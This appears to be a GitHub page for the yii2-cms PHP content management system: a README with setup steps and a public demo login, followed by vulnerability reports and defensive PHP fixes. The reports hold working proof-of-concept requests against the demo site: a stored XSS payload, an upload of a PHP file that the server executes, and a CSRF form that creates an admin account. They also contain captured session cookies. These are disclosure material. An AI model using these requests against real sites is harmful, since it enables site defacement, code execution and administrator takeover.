weison-tech / yii2-cms

An enterprise application based on the yii2 basic template.

Home Page: https://mym.pub

License: Other

Languages: PHP 85.02%, CSS 6.21%, JavaScript 8.71%, Batchfile 0.06%
Topics: yii2, cms, enterprise, adminlte, rbac, yii2-cms, yii2-enterprise

yii2-cms's Introduction

Yii2 CMS

This is a CMS based on the yii2 basic template; you can use it to build your own enterprise web site.

Directory structure

assets                   contains all asset files published by the Yii2 asset manager (js, css, fonts and so on).
protected
    core/
        commands/        contains all console commands.
        components/      contains all common components.
        config/          contains all config files.
        libs/            contains common helpers.
        messages/        contains common translation files.
        migrations/      contains common migration files.
        model/           contains common models.
        modules/         contains all core modules, such as the admin, file and installer modules.
        widgets/         contains all common widgets.
    modules/             contains all custom created modules.
    runtime/             contains all runtime files generated by the application.
    vendor/              contains all components and extensions installed by composer.
static
    css/                 contains some css.
    img/                 contains some images.
    js/                  contains some js.
themes
    default/             contains the application's default theme.
tools/
    gulp/                contains the gulp js and css compression tool.
uploads/                 contains all uploaded files.

Chinese documentation

Online backend demo: username admin, password 123456 (please do not modify the admin user). These credentials are for the public demo only; do not reuse them on your own installation.

Online frontend demo

Installation

1, Install (or update) the composer asset plugin. Note that fxp/composer-asset-plugin only works with Composer 1.

$ composer global require "fxp/composer-asset-plugin:*"

2, Install the yii2 cms code.

$ composer create-project --prefer-dist weison-tech/yii2-cms cms

3, Create the database.

4, Configure your virtual host so that you can reach the site.

5, Follow the installation wizard step by step.

6, For a production deployment, replace the index.php in the root folder with the production entry point (as in the yii2 basic template, this is where YII_DEBUG and YII_ENV are set, and debug mode must be off in production). In production you can also compress all js and css files into one file each.

7, Log in to the admin backend and configure permissions.

8, After the permissions are configured, edit protected/core/config/common.php and comment out 'admin/rbac/*' under the 'notCheckPermissionAction' configuration item. Until you do, the RBAC management actions are exempt from the permission check.

JS and CSS compression

1, First, install Node.js on your machine.

2, Install the dependencies for this application.

$ cd tools/gulp
$ npm install

3, Use the yii asset command to compress.

$ cd protected
$ php yii asset core/config/asset.php core/config/assets-prod.php

4, Update your application index file for the production environment.

Features

  1. AdminLTE template for the admin theme.

  2. RBAC management

  3. I18N

  4. News management system

  5. Products management system

    ...

Preview

Install: installer screenshots (images not reproduced here).

Frontend home page: screenshot.

Contact page: screenshot.

Admin backend: uses AdminLTE as the theme and layerui for alerts; the category tree can be folded. Screenshot.

Inline editing: screenshot.

Multiple image upload with drag-and-drop sorting: screenshot.

Change theme: screenshot.

Change language: screenshot.

Contact

WeChat QR code (image not reproduced here).

Donate

If you want to help the author buy pizza: WeChat reward code (image not reproduced here).

yii2-cms's People

Contributors: dependabot[bot], xiaomalover

yii2-cms's Issues


yii2-cms has a stored XSS

The message (contact) form on the frontend does not fully filter the input or limit its length.

Payload:
<script>alert(1)</script>
File: protected\core\modules\home\models\Contact.php
Code:

public function rules()
{
    return [
        [['name', 'company', 'mobile', 'email'], 'required'],
        [['demand'], 'string'],
        [['created_at', 'status'], 'integer'],
        [['name', 'company'], 'string', 'max' => 90],
        [['mobile'], 'string', 'max' => 16],
        ['mobile', 'match', 'pattern' => '/^[1][34578][0-9]{9}$/'],
        [['email'], 'string', 'max' => 64],
        [['email'], 'email'],
    ];
}

Exploitation
We found that name does not restrict the length of the input, so we tried constructing a payload.
PoC

POST /contact.html HTTP/1.1
Host: localhost
Content-Length: 306
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://127.0.0.1/contact.html
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: __admin_identity=29fde27f9d74d644704952c376eda49e0743225903055339da36226197fe5b70a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22__admin_identity%22%3Bi%3A1%3Bs%3A16%3A%22%5B1%2Cnull%2C2592000%5D%22%3B%7D; Hm_lvt_4e97099691e58af0969cfcdcc6b29090=1567164052; language=213818186103fa19c30d2710ecd18c48946ee2fed0bdcf0e471bab24ce058358a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22language%22%3Bi%3A1%3Bs%3A5%3A%22zh_cn%22%3B%7D; PHPSESSID=38ddvm4dugu5jdq4pt0h02qr5s; _csrf=5e85092cfa3136d9cc8ee4322826276d759fd8c851c83ede47293177c4fe9153a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22O12VBFrR_KCflwAXh8qvr4LMjscRlbem%22%3B%7D
Connection: close

_csrf=Aaq-w1PPi7_1C1seTIMQh0aI7VOoXKOf96plwSzQ9fpOm4yVEYn57apAGHgg9FHfLrCcJdpo79Kd2QaTQLKQlw%3D%3D&Contact%5Bname%5D=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&Contact%5Bemail%5D=133333%40qq.com&Contact%5Bmobile%5D=13333333333&Contact%5Bcompany%5D=1&Contact%5Bdemand%5D=1

Result
We check in the backend:
(screenshot)
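Editor's added example, not code from the report or from yii2-cms: the fix for the stored XSS above belongs at the output boundary. The posted Contact::rules() already caps name at 90 characters, and a length cap cannot stop a short payload, so the change is to HTML-encode each column when the admin backend renders the message. The renderRow* and h() functions and the sample rows are this example's own; in a Yii2 view the equivalent call is Html::encode().

```php
<?php
// Editor's added example, not yii2-cms code. Shows the vulnerable and the
// hardened way to render a stored contact row, plus a check a reviewer can
// run. Requires PHP 8 (str_contains).
declare(strict_types=1);

// Constructed sample rows: the first is exactly what the PoC above stores.
const SAMPLE_ROWS = [
    ['name' => '<script>alert(1)</script>', 'company' => '1',               'email' => '133333@qq.com'],
    ['name' => "Alice O'Neil",              'company' => 'Acme & Co <R&D>', 'email' => 'alice@example.com'],
];

// Vulnerable pattern: column values interpolated straight into HTML.
function renderRowUnsafe(array $row): string
{
    return "<tr><td>{$row['name']}</td><td>{$row['company']}</td><td>{$row['email']}</td></tr>";
}

// Hardened pattern: encode every untrusted value for an HTML text context.
// yii\helpers\Html::encode() makes the same htmlspecialchars() call, so in a
// Yii2 view write Html::encode($model->name); GridView columns encode unless
// a column is set to 'format' => 'raw'.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function renderRowSafe(array $row): string
{
    return '<tr><td>' . h($row['name']) . '</td><td>' . h($row['company'])
         . '</td><td>' . h($row['email']) . '</td></tr>';
}

// Reviewer check: a value containing HTML metacharacters must not appear
// verbatim in the rendered markup.
function rawValueSurvives(string $html, array $row): bool
{
    foreach ($row as $value) {
        if (strpbrk($value, '<>"\'&') !== false && str_contains($html, $value)) {
            return true;
        }
    }
    return false;
}

foreach (SAMPLE_ROWS as $row) {
    foreach (['unsafe' => renderRowUnsafe($row), 'safe' => renderRowSafe($row)] as $label => $html) {
        printf("%-6s raw value survives: %-3s %s\n", $label, rawValueSurvives($html, $row) ? 'yes' : 'no', $html);
    }
}
```

The unsafe renderer reports "yes" for both rows (the script tag and the apostrophe both survive); the safe renderer reports "no" for both. The second row shows why encoding rather than blocking is the right fix: a legitimate company name with & and < must still display correctly.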

Feedback: yii2-cms has an arbitrary file upload vulnerability

Admin backend: http://cms.mym.pub/admin/
System settings -> Attachment settings -> set the allowed upload types
(screenshot)
Case management -> edit a case -> album image upload: upload a php file
Contents of the php file:

(screenshot)

The file URL is returned and the file is executed by the server:
http://cms.mym.pub/uploads/file/ba4ceee9-0edd-429e-b7c9-c1e3c16855f0/file.php

(screenshot)

PoC:

POST /file/file/upload.html?fileparam=_fileinput_w2 HTTP/1.1
Host: cms.mym.pub
Content-Length: 4105
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://cms.mym.pub
X-CSRF-Token: l2xHPy6dMq0XI3AcIaDDG0jomrA9K0cRFWOQNzmvacfINB5Oevl343xyIyUY8pZ9foPc-mJzNFdgMNl6YZ5Evw==
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfTP81o1cPCbdRvng
Referer: http://cms.mym.pub/products/admin/products/update.html?id=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-HK,zh-CN;q=0.9,zh;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: PHPSESSID=gp68hjit6kbnd72nsmng8pllij; __admin_identity=29fde27f9d74d644704952c376eda49e0743225903055339da36226197fe5b70a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22__admin_identity%22%3Bi%3A1%3Bs%3A16%3A%22%5B1%2Cnull%2C2592000%5D%22%3B%7D; _csrf=cb8572108f854db47b0292008d760f14f03ae4f36099d6e6efd3d63dc3ee07a8a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22_XYqTdENkQS99RUf6kFJ_XsFuSIMX1-x%22%3B%7D; Hm_lvt_4e97099691e58af0969cfcdcc6b29090=1569545905; Hm_lpvt_4e97099691e58af0969cfcdcc6b29090=1569545905
Connection: close

------WebKitFormBoundaryfTP81o1cPCbdRvng
Content-Disposition: form-data; name="_csrf"

l2xHPy6dMq0XI3AcIaDDG0jomrA9K0cRFWOQNzmvacfINB5Oevl343xyIyUY8pZ9foPc-mJzNFdgMNl6YZ5Evw==
------WebKitFormBoundaryfTP81o1cPCbdRvng
Content-Disposition: form-data; name="Products[category_id]"

3
------WebKitFormBoundaryfTP81o1cPCbdRvng
Content-Disposition: form-data; name="Products[industry_id]"

8
------WebKitFormBoundaryfTP81o1cPCbdRvng
Content-Disposition: form-data; name="Products[name]"

鸿 (rest of the product name garbled in extraction)
------WebKitFormBoundaryfTP81o1cPCbdRvng
Content-Disposition: form-data; name="Products[title]"

鸿 (rest of the product title garbled in extraction)
------WebKitFormBoundaryfTP81o1cPCbdRvng
Content-Disposition: form-data; name="Products[thumb]"

1
------WebKitFormBoundaryfTP81o1cPCbdRvng
Content-Disposition: form-data; name="Products[thumb][order]"

------WebKitFormBoundaryfTP81o1cPCbdRvng
Content-Disposition: form-data; name="Products[thumb][guid]"

754d55d3-f183-405b-9969-7838274ff86c
------WebKitFormBoundaryfTP81o1cPCbdRvng
Content-Disposition: form-data; name="Products[images]"

------WebKitFormBoundaryfTP81o1cPCbdRvng
Content-Disposition: form-data; name="Products[description]"

(Chinese company description, garbled in extraction; only the link survived: http://www.hs-te.com)
------WebKitFormBoundaryfTP81o1cPCbdRvng
Content-Disposition: form-data; name="Products[sort_order]"

0
------WebKitFormBoundaryfTP81o1cPCbdRvng
Content-Disposition: form-data; name="Products[status]"

1
------WebKitFormBoundaryfTP81o1cPCbdRvng
Content-Disposition: form-data; name="_fileinput_w2[]"; filename="phpinfo.php"
Content-Type: application/octet-stream

------WebKitFormBoundaryfTP81o1cPCbdRvng--
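Editor's added example, not code from the report or from yii2-cms: the report above turns an admin-editable "allowed upload types" setting into code execution, because the setting is the only thing standing between an upload and a .php file under a web-served uploads/ directory. The gate below stays safe whatever the setting contains, and the nginx fragment is the independent second layer. All names and the server layout are this example's own assumptions.

```php
<?php
// Editor's added example, not yii2-cms code. An upload gate that stays safe
// even if an administrator adds "php" to the allowed-types setting, as in the
// report above. All names here are this example's own. Requires PHP 8.
declare(strict_types=1);

// Hard denylist: executable or active content, never acceptable regardless of
// the admin setting. PHP handlers commonly map several of these to the engine.
const NEVER_ALLOWED = [
    'php', 'php3', 'php4', 'php5', 'php7', 'php8', 'phtml', 'pht', 'phps', 'phar',
    'cgi', 'pl', 'py', 'sh', 'htaccess', 'html', 'htm', 'shtml', 'xhtml', 'svg', 'js',
];

// Magic bytes for the image types the code knows how to verify. The
// client-supplied Content-Type (application/octet-stream in the PoC) is ignored.
const IMAGE_MAGIC = [
    'png'  => ["\x89PNG\r\n\x1a\n"],
    'jpg'  => ["\xFF\xD8\xFF"],
    'jpeg' => ["\xFF\xD8\xFF"],
    'gif'  => ['GIF87a', 'GIF89a'],
];

/**
 * Validate an upload and return the random name to store it under, or throw.
 * $adminAllowed is the list from the settings page; it is intersected with
 * what this code can actually verify, so it can narrow the allowlist but
 * never widen it.
 */
function acceptUpload(string $clientName, string $tmpPath, array $adminAllowed): string
{
    $base = basename($clientName);
    // Strict by design: exactly one extension, so "shell.php.png" is rejected
    // before any handler sees a ".php" segment.
    if (substr_count($base, '.') !== 1) {
        throw new RuntimeException("reject: name must have exactly one extension: $base");
    }
    $ext = strtolower(pathinfo($base, PATHINFO_EXTENSION));
    if (in_array($ext, NEVER_ALLOWED, true)) {
        throw new RuntimeException("reject: .$ext is executable or active content");
    }
    $effective = array_intersect(array_map('strtolower', $adminAllowed), array_keys(IMAGE_MAGIC));
    if (!in_array($ext, $effective, true)) {
        throw new RuntimeException("reject: .$ext is not in the verifiable allowlist");
    }
    $head = (string) file_get_contents($tmpPath, false, null, 0, 16);
    foreach (IMAGE_MAGIC[$ext] as $magic) {
        if (str_starts_with($head, $magic)) {
            // Never keep the client's name: random name plus the verified extension.
            return bin2hex(random_bytes(16)) . '.' . $ext;
        }
    }
    throw new RuntimeException("reject: content of $base does not match .$ext");
}

// Second, independent layer: the web server must not execute anything under
// /uploads even if the gate is bypassed. nginx (assumed layout), placed before
// the generic "location ~ \.php$" fastcgi block because the first matching
// regex location wins:
//     location ~* ^/uploads/.*\.(php|phtml|phar|pht)$ { return 403; }
// Or serve /uploads from a host that has no PHP handler at all.

// Constructed demo: a real PNG header and the PoC's phpinfo.php, with the
// admin setting widened to include php as in the report.
$png = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($png, "\x89PNG\r\n\x1a\n" . str_repeat("\0", 32));
$php = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($php, '<?php phpinfo();');
$adminSetting = ['jpg', 'png', 'php'];

foreach ([['photo.png', $png], ['phpinfo.php', $php], ['shell.php.png', $php], ['fake.png', $php]] as [$name, $path]) {
    try {
        echo "$name -> stored as " . acceptUpload($name, $path, $adminSetting) . "\n";
    } catch (RuntimeException $e) {
        echo "$name -> " . $e->getMessage() . "\n";
    }
}
unlink($png);
unlink($php);
```

Only photo.png is stored; phpinfo.php is rejected by the hard denylist even though the admin setting allows it, shell.php.png by the one-extension rule, and fake.png by the magic-byte check. The stored name is random, so nothing from the client's filename reaches the filesystem or the returned URL.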

There is a CSRF vulnerability that can add an administrator account

After the administrator has logged in, open the following page

PoC:
one.html -- adds an admin user

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://cms.mym.pub/admin/admin/create.html" method="POST">
      <input type="hidden" name="&#95;csrf" value="bPvpzRrFNvX0xUOLMPsjUXClXdKfJsD3qNk&#95;R4VP8bYOl72bVI1xhYexDdF7oU8FPMQ4q8VCh73duEgxtTW&#45;xQ&#61;&#61;" />
      <input type="hidden" name="Admin&#91;username&#93;" value="csrf&#95;test1" />
      <input type="hidden" name="Admin&#91;email&#93;" value="1234&#64;qq&#46;com" />
      <input type="hidden" name="Admin&#91;password&#93;" value="csrf&#95;test1" />
      <input type="hidden" name="Admin&#91;status&#93;" value="2" />
      <input type="hidden" name="Admin&#91;avatar&#93;" value="" />
      <input type="hidden" name="&#95;fileinput&#95;w1" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


Checking:

(screenshot)
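Editor's added example, not code from the report, from yii2-cms or from the Yii framework: the one.html PoC above carries a fixed _csrf value. The block below illustrates what a Yii2-style CSRF check does with such a value, mirroring the mask/unmask scheme of yii\base\Security::maskToken()/unmaskToken() and the comparison in yii\web\Request::validateCsrfToken(); the function and variable names and the scenario are this example's own.

```php
<?php
// Editor's added example, not yii2-cms or Yii framework code. Illustrates what
// a Yii2-style CSRF check does with the fixed "_csrf" value in the PoC above.
// The mask/unmask scheme mirrors yii\base\Security::maskToken()/unmaskToken();
// names are this example's own.
declare(strict_types=1);

function base64UrlEncode(string $s): string { return strtr(base64_encode($s), '+/', '-_'); }
function base64UrlDecode(string $s): string { return (string) base64_decode(strtr($s, '-_', '+/'), true); }

// The real token lives in the victim's signed _csrf cookie (or session); each
// rendered form carries a freshly masked copy, so the hidden field changes on
// every page load while the underlying token stays the same.
function maskToken(string $token): string
{
    $mask = random_bytes(strlen($token));
    return base64UrlEncode($mask . ($mask ^ $token));
}

function unmaskToken(string $masked): string
{
    $decoded = base64UrlDecode($masked);
    $len = intdiv(strlen($decoded), 2);
    if ($len === 0 || $len * 2 !== strlen($decoded)) {
        return '';
    }
    return substr($decoded, $len) ^ substr($decoded, 0, $len);
}

// What the framework checks on every POST when enableCsrfValidation is on.
function validateCsrf(?string $clientToken, string $trueToken): bool
{
    if ($clientToken === null || $clientToken === '') {
        return false;
    }
    return hash_equals($trueToken, unmaskToken($clientToken));
}

// Constructed scenario: the attacker and the victim each have their own token.
$attackerToken = random_bytes(32);
$victimToken   = random_bytes(32);

// The hidden _csrf field in one.html is a masked token captured from the
// attacker's own logged-in browser.
$pocField = maskToken($attackerToken);

$checks = [
    'PoC replayed in the session it was captured from' => validateCsrf($pocField, $attackerToken),
    'PoC served to a victim with a different cookie'   => validateCsrf($pocField, $victimToken),
    'form without any _csrf field'                     => validateCsrf(null, $victimToken),
];
foreach ($checks as $label => $accepted) {
    printf("%-50s -> %s\n", $label, $accepted ? 'ACCEPTED' : 'rejected');
}
```

Only the first line comes back ACCEPTED. When triaging this report, submit one.html from a browser whose admin session is not the one the _csrf value was captured from: with the check enabled, Yii2 answers 400 "Unable to verify your data submission." If the account is created anyway, CSRF validation has been switched off for that controller or action (enableCsrfValidation), and the fix is to turn the built-in check back on rather than to add another token scheme.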
